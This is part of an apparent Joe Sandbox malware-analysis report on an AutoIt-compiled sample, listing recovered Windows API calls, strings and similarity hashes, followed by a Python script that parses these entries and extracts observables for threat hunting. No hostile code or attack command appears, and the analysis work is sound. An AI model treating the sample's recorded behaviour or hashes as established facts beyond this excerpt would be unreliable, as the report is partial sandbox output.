                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D
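The entries above are the sandbox's per-function records for the AutoIt-compiled stage at image base 00400000: the API calls it recovered with their arguments (a leading "?" marks an argument it could not resolve), the strings the function references, and the similarity keys (API ID, String ID, API String ID, Opcode ID and the two fuzzy hashes). Note that the two Shell_TrayWnd functions share one API String ID (529655941-2988720461) while their Opcode IDs differ. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in this format, names the window message in recovered PostMessageW/SendMessageW arguments (0x0111 is WM_COMMAND in winuser.h), groups functions by API String ID to surface such behaviour-equal code pairs, and collects API names and strings as hunting observables. The SAMPLE text is a constructed excerpt copied from three of the entries above with some fields dropped; the regular expressions, the use of API String ID as an opaque grouping key, and the reading of "$" as a separator between several strings in one String ID are my assumptions inferred from the entries on this page, not documented Joe Sandbox behaviour.

```python
"""Parser for Joe Sandbox per-function entries (the 'APIs' / 'Similarity' blocks above)."""
import re
from collections import defaultdict

# Constructed excerpt: three of this report's own entries, with Memory Dump Source,
# Instruction ID and fuzzy-hash lines left out; any "• Key: Value" line is kept by the parser.
SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
"""

WM_NAMES = {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}  # winuser.h values
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # an argument the sandbox recovered as a 32-bit immediate
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")


def parse_entries(text):
    """One record per 'APIs' block: the recovered calls plus every '• Key: Value' field."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "fields": {}}
            entries.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                "ref": m["ref"], "subcall_of": m["sub"]})  # sub is None for direct calls
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur["fields"][m["key"].strip()] = m["val"].strip()
    return entries


def decode_message(call):
    """Name the Msg argument of Post/SendMessage when the sandbox recovered it as an immediate."""
    if call["name"] not in ("PostMessageW", "SendMessageW", "PostMessageA", "SendMessageA"):
        return None
    a = call["args"]
    if len(a) < 2 or not HEX8.match(a[1]):
        return None  # message number shown as '?' or not captured at all
    msg = int(a[1], 16)
    wparam = int(a[2], 16) if len(a) > 2 and HEX8.match(a[2]) else None
    return {"msg": msg, "msg_name": WM_NAMES.get(msg, f"0x{msg:04X}"), "wparam": wparam}


def behaviour_duplicates(entries):
    """API String ID -> sorted distinct Opcode IDs, for IDs shared by more than one function.

    Assumption: a shared API String ID means the same API set and string set were recorded,
    so differing Opcode IDs point at distinct code with the same observable behaviour."""
    groups = defaultdict(set)
    for e in entries:
        f = e["fields"]
        if "API String ID" in f and "Opcode ID" in f:
            groups[f["API String ID"]].add(f["Opcode ID"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def observables(entries):
    """API names and literal strings to hunt on; '$' is read as the joiner between strings."""
    apis = sorted({f'{c["name"]}.{c["module"]}' for e in entries for c in e["apis"]})
    strings = {s for e in entries for s in e["fields"].get("String ID", "").split("$") if s}
    return apis, sorted(strings)


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for r in recs:
        for c in r["apis"]:
            d = decode_message(c)
            if d:
                print(f'{c["ref"]}: {c["name"]} {d["msg_name"]} wParam={d["wparam"]}')
    print(behaviour_duplicates(recs))
    print(observables(recs))
```

Run as a script it prints the one PostMessageW whose message was recovered (ref 00441C3D: WM_COMMAND with wParam 407, i.e. 0x197), the API String ID shared by the two Shell_TrayWnd functions with their two Opcode IDs, and the API/string observables. Feed it a larger slice of this report (the full entries, Memory Dump Source lines included) and the same grouping shows which functions the sandbox considers behaviourally identical across dumps.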